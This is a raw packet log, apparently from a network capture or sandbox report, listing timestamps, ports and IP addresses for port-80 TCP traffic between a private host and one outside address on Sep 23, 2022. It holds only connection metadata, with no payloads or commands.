Sep 23, 2022 08:13:02.059170008 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059216022 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059254885 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059293032 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059328079 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059331894 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059365034 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059370995 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059392929 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059425116 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059456110 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059495926 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059536934 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059542894 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059578896 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059616089 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059626102 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059633017 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059638977 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059644938 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059665918 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059705019 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059705973 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059720993 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059745073 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059756041 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059784889 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059794903 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059823990 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059834003 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059864998 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059873104 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059906960 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059915066 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059945107 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059957027 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.059984922 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.059993029 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060024023 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060034037 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060064077 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060074091 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060103893 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060115099 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060142994 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060158968 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060187101 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060195923 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060229063 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060236931 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060266972 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060277939 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060307026 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060319901 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060348034 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060355902 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060386896 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060399055 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060426950 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060465097 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060472012 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060482025 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060506105 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060513973 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060554028 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060574055 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060590982 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060612917 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060631990 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060651064 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060671091 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060692072 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060709953 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060719967 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060750008 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060756922 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060802937 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060833931 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060861111 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060875893 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060882092 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060918093 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060933113 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060955048 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.060966969 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.060992956 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061002970 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061028004 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061043024 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061064005 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061079025 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061099052 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061111927 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061139107 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061148882 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061180115 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061188936 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061216116 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061232090 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061268091 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061290979 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061306000 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061311960 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061342001 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061353922 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061378002 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061394930 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061414003 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061423063 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061450005 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061461926 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061486959 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061503887 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061525106 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061539888 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061561108 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061574936 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061598063 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061613083 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061635017 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061645031 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061671019 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061681986 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061717987 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061722994 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061754942 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061765909 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061789989 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061800957 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061826944 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061841011 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061862946 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061875105 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061901093 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061912060 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061939001 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061949968 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.061975002 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.061989069 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062011957 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062021017 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062048912 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062061071 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062096119 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062100887 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062131882 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062145948 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062169075 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062182903 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062206984 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062216997 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062243938 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062254906 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062279940 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062290907 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062316895 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062334061 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062355042 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062362909 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062391043 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062403917 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062427998 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062438965 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062465906 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062474966 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062501907 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062514067 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062539101 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062552929 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062573910 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062587023 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062612057 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062623024 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062649965 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062660933 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062685013 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062697887 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062722921 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062735081 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062760115 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062771082 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062796116 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062807083 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062833071 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062843084 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062870026 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062879086 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062906981 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062916994 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062944889 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062958002 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.062980890 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.062994003 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063018084 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063028097 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063055038 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063065052 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063091040 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063102961 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063127041 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063132048 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063144922 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063162088 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063169003 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063209057 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063220978 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063422918 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063433886 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063461065 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063473940 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063497066 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063512087 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063533068 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063545942 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063569069 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063580990 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063604116 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063616991 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063668966 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063704967 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063707113 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063719988 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063741922 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063764095 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063777924 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063796997 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063815117 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063827991 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063852072 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063864946 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063889027 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063901901 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063925028 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063941956 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.063961029 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.063980103 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064001083 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064011097 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064035892 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064054966 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064071894 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064106941 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064107895 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064121962 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064145088 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064163923 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064199924 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064232111 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064271927 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064296007 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064308882 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064328909 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064346075 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064366102 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064383030 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064404011 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064419031 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064450026 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064459085 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064471960 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064498901 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064523935 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064534903 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064594030 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064636946 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064640045 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064680099 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064699888 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064733028 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064743996 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064786911 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064825058 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064825058 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064840078 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.064862967 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064901114 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064939022 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.064973116 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065011024 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065047979 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065083027 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065119982 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065121889 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065155983 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065196037 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065234900 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065269947 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065305948 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065342903 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065346956 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065378904 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065383911 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065416098 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065457106 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065423012 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065491915 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065512896 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065519094 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065521955 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065525055 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065527916 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065531969 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065534115 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065536022 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065540075 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065543890 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065546989 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065551043 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065552950 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065556049 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065557957 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065561056 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065571070 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065608978 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065634012 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065639973 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065643072 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065645933 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065681934 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065713882 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065717936 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065725088 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065754890 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065789938 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065792084 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065829992 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065831900 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065861940 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065866947 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065898895 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065917969 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.065944910 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.065958023 CEST	49171	80	192.168.2.22	159.223.2.212
